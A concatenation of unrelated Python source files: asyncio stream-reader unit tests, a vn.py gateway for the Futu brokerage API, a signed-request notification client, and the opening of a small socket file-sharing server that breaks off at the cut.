with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. StreamReaders are fed with data after
# their 'readline' methods are called.
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
@asyncio.coroutine
def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2], loop=self.loop))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
@asyncio.coroutine
def handle_client(self, client_reader, client_writer):
data = yield from client_reader.readline()
client_writer.write(data)
yield from client_writer.drain()
client_writer.close()
def start(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
@asyncio.coroutine
def client(addr):
reader, writer = yield from asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = yield from reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
addr = server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
addr = server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
@asyncio.coroutine
def handle_client(self, client_reader, client_writer):
data = yield from client_reader.readline()
client_writer.write(data)
yield from client_writer.drain()
client_writer.close()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
@asyncio.coroutine
def client(path):
reader, writer = yield from asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = yield from reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# StreamReader's limit so that twice the limit is less than the size
# of the data written. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
reader = asyncio.StreamReader(loop=self.loop, limit=1)
protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(*args,
pass_fds={wfd},
loop=self.loop)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(reader.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader()
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
q = queue.Queue()
def server():
# Runs in a separate thread.
sock = socket.socket()
with sock:
sock.bind(('localhost', 0))
sock.listen(1)
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
@asyncio.coroutine
def client(host, port):
reader, writer = yield from asyncio.open_connection(host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
yield from writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123)
self.assertEqual("<StreamReader l=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader e=RuntimeError()>", repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
"<StreamReader w=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader t=<Transport>>", repr(stream))
if __name__ == '__main__':
unittest.main()
|
futu_gateway.py
|
"""
Please install futu-api before use.
"""
from copy import copy
from datetime import datetime
from threading import Thread
from time import sleep
import pytz
from futu import (
ModifyOrderOp,
TrdSide,
TrdEnv,
OpenHKTradeContext,
OpenQuoteContext,
OpenUSTradeContext,
OrderBookHandlerBase,
OrderStatus,
OrderType,
RET_ERROR,
RET_OK,
StockQuoteHandlerBase,
TradeDealHandlerBase,
TradeOrderHandlerBase
)
from vnpy.trader.constant import Direction, Exchange, Product, Status
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
AccountData,
ContractData,
PositionData,
SubscribeRequest,
OrderRequest,
CancelRequest
)
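# Mappings between vn.py constants and the codes used by the Futu API.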
EXCHANGE_VT2FUTU = {
Exchange.SMART: "US",
Exchange.SEHK: "HK",
Exchange.HKFE: "HK_FUTURE",
}
EXCHANGE_FUTU2VT = {v: k for k, v in EXCHANGE_VT2FUTU.items()}
PRODUCT_VT2FUTU = {
Product.EQUITY: "STOCK",
Product.INDEX: "IDX",
Product.ETF: "ETF",
Product.WARRANT: "WARRANT",
Product.BOND: "BOND",
}
DIRECTION_VT2FUTU = {
Direction.LONG: TrdSide.BUY,
Direction.SHORT: TrdSide.SELL,
}
DIRECTION_FUTU2VT = {v: k for k, v in DIRECTION_VT2FUTU.items()}
STATUS_FUTU2VT = {
OrderStatus.NONE: Status.SUBMITTING,
OrderStatus.SUBMITTING: Status.SUBMITTING,
OrderStatus.SUBMITTED: Status.NOTTRADED,
OrderStatus.FILLED_PART: Status.PARTTRADED,
OrderStatus.FILLED_ALL: Status.ALLTRADED,
OrderStatus.CANCELLED_ALL: Status.CANCELLED,
OrderStatus.CANCELLED_PART: Status.CANCELLED,
OrderStatus.SUBMIT_FAILED: Status.REJECTED,
OrderStatus.FAILED: Status.REJECTED,
OrderStatus.DISABLED: Status.CANCELLED,
}
CHINA_TZ = pytz.timezone("Asia/Shanghai")
class FutuGateway(BaseGateway):
""""""
default_setting = {
"密码": "",
"地址": "127.0.0.1",
"端口": 11111,
"市场": ["HK", "US"],
"环境": [TrdEnv.REAL, TrdEnv.SIMULATE],
}
exchanges = list(EXCHANGE_FUTU2VT.values())
def __init__(self, event_engine):
"""Constructor"""
super(FutuGateway, self).__init__(event_engine, "FUTU")
self.quote_ctx = None
self.trade_ctx = None
self.host = ""
self.port = 0
self.market = ""
self.password = ""
self.env = TrdEnv.SIMULATE
self.ticks = {}
self.trades = set()
self.contracts = {}
self.thread = Thread(target=self.query_data)
# Counters used to throttle the timer-driven account/position queries.
self.count = 0
self.interval = 1
self.query_funcs = [self.query_account, self.query_position]
def connect(self, setting: dict):
""""""
self.host = setting["地址"]
self.port = setting["端口"]
self.market = setting["市场"]
self.password = setting["密码"]
self.env = setting["环境"]
self.connect_quote()
self.connect_trade()
self.thread.start()
def query_data(self):
"""
Query all data necessary.
"""
sleep(2.0) # Wait 2 seconds till connection completed.
self.query_contract()
self.query_trade()
self.query_order()
self.query_position()
self.query_account()
# Start fixed interval query.
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < self.interval:
return
self.count = 0
func = self.query_funcs.pop(0)
func()
self.query_funcs.append(func)
def connect_quote(self):
"""
Connect to market data server.
"""
self.quote_ctx = OpenQuoteContext(self.host, self.port)
class QuoteHandler(StockQuoteHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(QuoteHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_quote(content)
return RET_OK, content
class OrderBookHandler(OrderBookHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderBookHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_orderbook(content)
return RET_OK, content
self.quote_ctx.set_handler(QuoteHandler())
self.quote_ctx.set_handler(OrderBookHandler())
self.quote_ctx.start()
self.write_log("行情接口连接成功")
def connect_trade(self):
"""
Connect to trade server.
"""
# Initialize context according to market.
if self.market == "US":
self.trade_ctx = OpenUSTradeContext(self.host, self.port)
else:
self.trade_ctx = OpenHKTradeContext(self.host, self.port)
# Implement handlers.
class OrderHandler(TradeOrderHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_order(content)
return RET_OK, content
class DealHandler(TradeDealHandlerBase):
gateway = self
def on_recv_rsp(self, rsp_str):
ret_code, content = super(DealHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_deal(content)
return RET_OK, content
# Unlock to allow trading.
code, data = self.trade_ctx.unlock_trade(self.password)
if code == RET_OK:
self.write_log("交易接口解锁成功")
else:
self.write_log(f"交易接口解锁失败,原因:{data}")
# Start context.
self.trade_ctx.set_handler(OrderHandler())
self.trade_ctx.set_handler(DealHandler())
self.trade_ctx.start()
self.write_log("交易接口连接成功")
def subscribe(self, req: SubscribeRequest):
""""""
for data_type in ["QUOTE", "ORDER_BOOK"]:
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
code, data = self.quote_ctx.subscribe(futu_symbol, data_type, True)
if code:
self.write_log(f"订阅行情失败:{data}")
def send_order(self, req: OrderRequest):
""""""
side = DIRECTION_VT2FUTU[req.direction]
futu_order_type = OrderType.NORMAL # Only limit order is supported.
# Set price adjustment mode to inside adjustment.
if req.direction is Direction.LONG:
adjust_limit = 0.05
else:
adjust_limit = -0.05
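# adjust_limit lets Futu adjust the price to a valid price step, by at most
# +5% (upward) for buy orders and -5% (downward) for sell orders.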
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
code, data = self.trade_ctx.place_order(
req.price,
req.volume,
futu_symbol,
side,
futu_order_type,
trd_env=self.env,
adjust_limit=adjust_limit,
)
if code:
self.write_log(f"委托失败:{data}")
return ""
for ix, row in data.iterrows():
orderid = str(row["order_id"])
order = req.create_order_data(orderid, self.gateway_name)
self.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
code, data = self.trade_ctx.modify_order(
ModifyOrderOp.CANCEL, req.orderid, 0, 0, trd_env=self.env
)
if code:
self.write_log(f"撤单失败:{data}")
def query_contract(self):
""""""
for product, futu_product in PRODUCT_VT2FUTU.items():
code, data = self.quote_ctx.get_stock_basicinfo(
self.market, futu_product
)
if code:
self.write_log(f"查询合约信息失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
contract = ContractData(
symbol=symbol,
exchange=exchange,
name=row["name"],
product=product,
size=1,
pricetick=0.001,
net_position=True,
gateway_name=self.gateway_name,
)
self.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.write_log("合约信息查询成功")
def query_account(self):
""""""
code, data = self.trade_ctx.accinfo_query(trd_env=self.env, acc_id=0)
if code:
self.write_log(f"查询账户资金失败:{data}")
return
for ix, row in data.iterrows():
account = AccountData(
accountid=f"{self.gateway_name}_{self.market}",
balance=float(row["total_assets"]),
frozen=(float(row["total_assets"]) -
float(row["avl_withdrawal_cash"])),
gateway_name=self.gateway_name,
)
self.on_account(account)
def query_position(self):
""""""
code, data = self.trade_ctx.position_list_query(
trd_env=self.env, acc_id=0
)
if code:
self.write_log(f"查询持仓失败:{data}")
return
for ix, row in data.iterrows():
symbol, exchange = convert_symbol_futu2vt(row["code"])
pos = PositionData(
symbol=symbol,
exchange=exchange,
direction=Direction.LONG,
volume=row["qty"],
frozen=(float(row["qty"]) - float(row["can_sell_qty"])),
price=float(row["cost_price"]),
pnl=float(row["pl_val"]),
gateway_name=self.gateway_name,
)
self.on_position(pos)
def query_order(self):
""""""
code, data = self.trade_ctx.order_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询委托失败:{data}")
return
self.process_order(data)
self.write_log("委托查询成功")
def query_trade(self):
""""""
code, data = self.trade_ctx.deal_list_query("", trd_env=self.env)
if code:
self.write_log(f"查询成交失败:{data}")
return
self.process_deal(data)
self.write_log("成交查询成功")
def close(self):
""""""
if self.quote_ctx:
self.quote_ctx.close()
if self.trade_ctx:
self.trade_ctx.close()
def get_tick(self, code):
"""
Get tick buffer.
"""
tick = self.ticks.get(code, None)
symbol, exchange = convert_symbol_futu2vt(code)
if not tick:
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.now(CHINA_TZ),
gateway_name=self.gateway_name,
)
self.ticks[code] = tick
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
return tick
def process_quote(self, data):
"""报价推送"""
for ix, row in data.iterrows():
symbol = row["code"]
date = row["data_date"].replace("-", "")
time = row["data_time"]
dt = datetime.strptime(f"{date} {time}", "%Y%m%d %H:%M:%S")
dt = CHINA_TZ.localize(dt)
tick = self.get_tick(symbol)
tick.datetime = dt
tick.open_price = row["open_price"]
tick.high_price = row["high_price"]
tick.low_price = row["low_price"]
tick.pre_close = row["prev_close_price"]
tick.last_price = row["last_price"]
tick.volume = row["volume"]
if "price_spread" in row:
spread = row["price_spread"]
tick.limit_up = tick.last_price + spread * 10
tick.limit_down = tick.last_price - spread * 10
self.on_tick(copy(tick))
def process_orderbook(self, data):
""""""
symbol = data["code"]
tick = self.get_tick(symbol)
d = tick.__dict__
for i in range(5):
bid_data = data["Bid"][i]
ask_data = data["Ask"][i]
n = i + 1
d["bid_price_%s" % n] = bid_data[0]
d["bid_volume_%s" % n] = bid_data[1]
d["ask_price_%s" % n] = ask_data[0]
d["ask_volume_%s" % n] = ask_data[1]
if tick.datetime:
self.on_tick(copy(tick))
def process_order(self, data):
"""
Process order data for both query and update.
"""
for ix, row in data.iterrows():
# Ignore order with status DELETED
if row["order_status"] == OrderStatus.DELETED:
continue
symbol, exchange = convert_symbol_futu2vt(row["code"])
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=str(row["order_id"]),
direction=DIRECTION_FUTU2VT[row["trd_side"]],
price=float(row["price"]),
volume=row["qty"],
traded=row["dealt_qty"],
status=STATUS_FUTU2VT[row["order_status"]],
datetime=generate_datetime(row["create_time"]),
gateway_name=self.gateway_name,
)
self.on_order(order)
def process_deal(self, data):
"""
Process trade data for both query and update.
"""
for ix, row in data.iterrows():
tradeid = str(row["deal_id"])
if tradeid in self.trades:
continue
self.trades.add(tradeid)
symbol, exchange = convert_symbol_futu2vt(row["code"])
trade = TradeData(
symbol=symbol,
exchange=exchange,
direction=DIRECTION_FUTU2VT[row["trd_side"]],
tradeid=tradeid,
orderid=row["order_id"],
price=float(row["price"]),
volume=row["qty"],
datetime=generate_datetime(row["create_time"]),
gateway_name=self.gateway_name,
)
self.on_trade(trade)
def convert_symbol_futu2vt(code):
"""
Convert symbol from futu to vt.
"""
code_list = code.split(".")
futu_exchange = code_list[0]
futu_symbol = ".".join(code_list[1:])
exchange = EXCHANGE_FUTU2VT[futu_exchange]
return futu_symbol, exchange
def convert_symbol_vt2futu(symbol, exchange):
"""
Convert symbol from vt to futu.
"""
futu_exchange = EXCHANGE_VT2FUTU[exchange]
return f"{futu_exchange}.{symbol}"
def generate_datetime(s: str) -> datetime:
if "." in s:
dt = datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")
else:
dt = datetime.strptime(s, "%Y-%m-%d %H:%M:%S")
dt = CHINA_TZ.localize(dt)
return dt
|
notice_client.py
|
# -*- coding: utf-8 -*-
import time
import random
import threading
from gevent.queue import JoinableQueue
from inner_lib.func_ext import get_md5, http_request
from inner_lib.func_ext import message_format
from conf.config import MAXSIZE
class NoticeClient(object):
init_flag = False
_instance = None
_instance_lock = threading.Lock()
def __new__(cls, *args, **kwargs):
        # Double-checked locking to create the singleton instance.
if not cls._instance:
with cls._instance_lock:
if not cls._instance:
cls._instance = super().__new__(cls)
return cls._instance
else:
return cls._instance
def __init__(self, app_key, app_secret, api_url):
        if not self.init_flag:  # Prevent __init__ from running more than once.
self.api_url = api_url
self.app_key = app_key
self.app_secret = app_secret
self.req_q = JoinableQueue(MAXSIZE)
self.init_flag = True
t1 = threading.Thread(target=http_request, args=[self.api_url, self.req_q])
t1.start()
else:
return
def sys_params(self, body):
"""构造请求参数参数"""
time.sleep(1)
now = int(time.time())
auth_key = '%d-%s-%s' % (now, self.app_secret, self.app_key)
auth_key_md5 = get_md5(auth_key)
auth_str = auth_key_md5[0:4] + str(random.randint(100, 999)) + auth_key_md5[4:24] + str(
random.randint(10000, 99999)) + auth_key_md5[24:]
_params = {
"key": self.app_key,
"auth_str": auth_str,
"timestamp": now,
"req_msg": body,
}
return _params
def send(self, data, to_users):
to_users = "|".join(to_users)
data = message_format(data)
body = {
"to_user": to_users,
"content": data
}
_params = self.sys_params(body)
self.req_q.put(_params)
return True
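# Minimal usage sketch (illustrative only; the key, secret and URL below are
# placeholders, not real credentials). Because NoticeClient is a singleton, any
# later NoticeClient(...) call returns the same instance, and its constructor
# arguments are ignored after the first initialisation:
#
#   client = NoticeClient("demo_key", "demo_secret", "https://example.com/notify")
#   client.send("job finished", ["alice", "bob"])  # queued and sent by the worker thread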
|
server.py
|
from shell import PRIMITIVE
import socket
import threading
import os
from utils import Utils
lock = threading.Lock()
class Server(object):
def __init__(self):
server_ip = "192.168.220.131"
server_port = 60000
self.server = socket.socket()
self.server.bind((server_ip, server_port))
self.server.listen()
self.threading_pool = []
def handler(self, conn: socket.socket, index: int):
Utils.send_message(conn, "Welcome to Deadpool and his star File Sharing Server! Enjoy yourself")
while True:
try:
op_type = Utils.recv_message(conn)
args = (Utils.recv_message(conn)).split(" ")
# content_size = struct.unpack('i', conn.recv(4))[0]
current_thread = threading.currentThread()
lock.acquire()
print("current thread id: %d" % current_thread.ident)
print("request from client %s: operation %s, args %s" % (conn.getpeername(), op_type, args))
lock.release()
if op_type == PRIMITIVE.SEND_FILE.name:
lock.acquire()
Utils.recv_file("server_mock_data_base", conn)
lock.release()
Utils.send_message(conn, PRIMITIVE.SEND_INFO.name)
